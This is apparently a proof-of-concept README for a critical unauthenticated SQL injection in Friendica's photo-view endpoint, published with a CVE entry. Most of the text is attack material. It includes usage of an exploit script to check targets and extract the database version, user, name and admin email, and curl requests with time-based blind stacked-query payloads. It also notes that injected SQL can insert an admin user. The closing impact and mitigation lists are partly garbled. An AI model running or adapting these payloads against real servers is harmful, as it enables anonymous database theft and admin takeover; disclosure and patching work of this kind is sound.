CVE-2026-72550 — Friendica Unauthenticated Stacked-Query SQL Injection PoC (CVSS 9.8 Critical)
Unauthenticated stacked-query SQL injection in the photos endpoint in Friendica allows any visitor to run arbitrary SQL.
| Field | Value |
|---|---|
| CVE ID | CVE-2026-72550 |
| Product | Friendica (self-hosted federated social network) |
| Affected | <= 2026.08-dev (git HEAD e3fc1bc) |
| Type | CWE-89: SQL Injection (unauthenticated, stacked queries) |
| Severity | Critical — CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |
| Auth required | None |
The photo-view endpoint in Friendica takes the order query parameter and concatenates it, unescaped, into a SHOW COLUMNS ... LIKE '...' statement that is run through a bare PDO::query() — which allows multiple statements. No login is required, and on a stock install (block_public is off by default) any publicly visible photo is enough. Because PDO::query() executes stacked statements, an anonymous attacker doesn't just read data — they run arbitrary SQL, including INSERT/UPDATE to create an admin user.
mod/photos.php:673 — reads raw $_GET['order']
DBStructure::existsColumn() — concatenates into: SHOW COLUMNS FROM `photo` LIKE '$column'
src/Database/DBStructure.php:714
DBA::p() → PDO::query() — executes with stacked statements enabled
The default request path reaches this code: $cmd defaults to 'view' (satisfying the $cmd === 'view' gate) and no_count is off, so no authentication and no non-default setting is needed.
# Install dependency
pip install requests
# Check if target is vulnerable (time-based detection)
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --check-only
# Extract database version via blind SQLi
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract version
# Extract current database user
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_user
# Extract current database name
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_name
# Extract first admin email
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract admin_email
| Flag | Description |
|---|---|
-u / --url | Target base URL (e.g. http://target:8176) |
-r / --user | Username whose photo gallery to hit |
-i / --resource-id | Resource ID of any publicly visible photo |
--extract | Value to exfiltrate: version, db_user, db_name, admin_email |
--check-only | Only test vulnerability, don't extract data |
--sleep | SLEEP delay in seconds (default: 5) |
No cookies or authentication needed. Point it at any public photo resource-id:
# Control — valid order, returns fast (~0.05s)
curl -s -o /dev/null -w "%{time_total}\n" \
"http://TARGET/photos/alice/image/RESOURCE_ID?order=created"
# Injection — stacked SLEEP(5) executes, response held ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
"http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20SLEEP(5)--%20-"
Decoded payload: x';SELECT SLEEP(5)-- -
The injected SQL becomes:
SHOW COLUMNS FROM `photo` LIKE 'x';SELECT SLEEP(5)-- -'
# TRUE condition (@@version starts with '1') → delays ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
"http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%271%27,SLEEP(5),0)--%20-"
# FALSE condition (@@version starts with '9') → returns fast
curl -s -o /dev/null -w "%{time_total}\n" \
"http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%279%27,SLEEP(5),0)--%20-"
An unauthenticated attacker can:
INSERT INTO userThis is a full database compromise reachable by any anonymous visitor on a default Friendica install.
order against the known column whitelist before useSHOW COLUMNSPDO::ATTR_EMULATE_PREPARES => false)| Date | Event |
|---|---|
| 2026-07-07 | Vulnerability discovered and confirmed on local instance |
| 2026-08-11 | CVE-2026-72550 published via TuranSec CNA |
This tool is provided for authorized security testing and educational purposes only. Use it only against systems you own or have explicit written permission to test. The author assumes no liability for misuse.
Discovered by Bobur Abdugafforov (@abdugafforov-bobur)
CVE assigned via TuranSec CNA